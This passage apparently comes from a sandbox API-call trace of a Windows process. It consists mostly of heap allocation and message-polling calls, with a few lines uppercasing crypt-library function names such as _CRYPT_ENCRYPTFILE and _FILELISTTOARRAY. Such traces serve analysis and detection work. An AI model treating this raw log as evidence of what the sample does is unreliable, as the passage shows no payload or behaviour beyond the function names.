Size=0x10) returned 0x2e76588 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f300 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78e88 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f310 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f310 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79040 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.189] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e600 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac48 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78eb0 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7c8b0 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f1c0 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7c8b0 | out: hHeap=0x970000) returned 1 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e788 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7c8b0 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7da20 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac48 | out: hHeap=0x970000) returned 1 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7da20 | out: hHeap=0x970000) returned 1 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978050 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e7da20 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e600 | out: hHeap=0x970000) returned 1 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.190] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78ed8 [0125.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.190] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78ed8 | out: hHeap=0x970000) returned 1 [0125.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.190] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78ed8 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.191] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78ed8 | out: hHeap=0x970000) returned 1 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.191] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e600 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.191] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e600 | out: hHeap=0x970000) returned 1 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.191] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.191] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.191] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.191] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.191] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e600 [0125.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.191] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e600 | out: hHeap=0x970000) returned 1 [0125.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.192] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.192] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0125.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78ed8 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.193] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78ed8 | out: hHeap=0x970000) returned 1 [0125.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.193] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e638 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.193] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0125.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e638 | out: hHeap=0x970000) returned 1 [0125.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.193] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.193] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0125.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.193] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79040 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac48 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f190 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78ed8 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f260 [0125.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78f00 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2d0 [0125.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50170 [0125.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f150 [0125.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f270 [0125.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f270 | out: hHeap=0x970000) returned 1 [0125.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f150 | out: hHeap=0x970000) returned 1 [0125.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50170 | out: hHeap=0x970000) returned 1 [0125.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2d0 | out: hHeap=0x970000) returned 1 [0125.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac48 | out: hHeap=0x970000) returned 1 [0125.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f190 | out: hHeap=0x970000) returned 1 [0125.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79040 | out: hHeap=0x970000) returned 1 [0125.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac48 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2d0 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79040 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f180 [0125.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e600 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f250 [0125.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f250 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac48 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2d0 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.196] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79540 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac48 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f170 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79400 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0125.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f190 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79298 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e537d0 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538a8 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2d0 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2d0 | out: hHeap=0x970000) returned 1 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac48 | out: hHeap=0x970000) returned 1 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f170 | out: hHeap=0x970000) returned 1 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538a8 | out: hHeap=0x970000) returned 1 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79540 | out: hHeap=0x970000) returned 1 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.197] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e536c8 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e536c8 | out: hHeap=0x970000) returned 1 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e793d8 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e536c8 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f170 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79478 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53710 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f230 [0125.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53710 | out: hHeap=0x970000) returned 1 [0125.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79428 [0125.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e537a0 [0125.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f1b0 [0125.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e536c8 | out: hHeap=0x970000) returned 1 [0125.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f1b0 | out: hHeap=0x970000) returned 1 [0125.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0125.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f170 | out: hHeap=0x970000) returned 1 [0125.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0125.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e793d8 | out: hHeap=0x970000) returned 1 [0125.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.280] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 